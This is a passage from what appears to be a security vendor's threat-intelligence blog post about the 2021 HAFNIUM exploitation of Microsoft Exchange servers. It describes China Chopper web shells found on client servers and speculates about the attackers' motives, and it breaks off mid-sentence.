On March 2, 2021, Microsoft released out-of-band patches for on-premises Microsoft Exchange Servers and described targeted exploitation by the likely China-based HAFNIUM threat group to steal data. Related reporting indicates that the campaign has been ongoing since at least January 2021. Organizations with vulnerable systems should apply these updates as soon as possible.
Secureworks® Counter Threat Unit™ (CTU) researchers observed elements of this campaign across our customer base. On March 1, our endpoint telemetry identified China Chopper web shells on Exchange Servers at approximately a dozen clients. We had detected similar activity affecting a smaller number of customers in February. China Chopper is a widely available web shell that has been used since at least 2013 and is relatively easily detected by endpoint controls.
This combination of exploitation technique and use of China Chopper made this activity particularly puzzling. Exploits for vulnerabilities that do not have a patch (also known as ‘zero-days’) are rare. Most government-sponsored actors avoid using zero-days because they don’t need to. Zero-days affecting Exchange are even rarer and are incredibly valuable because unauthenticated remote code execution on mail servers is a very bad thing. It was therefore surprising that the threat actors ‘burned’ valuable exploits by executing malware that would be quickly detected by many security vendors.
So why do it?
It is always risky to make assumptions or attempt to rationalize the actions of threat actors who are operating in an unknown operational a ..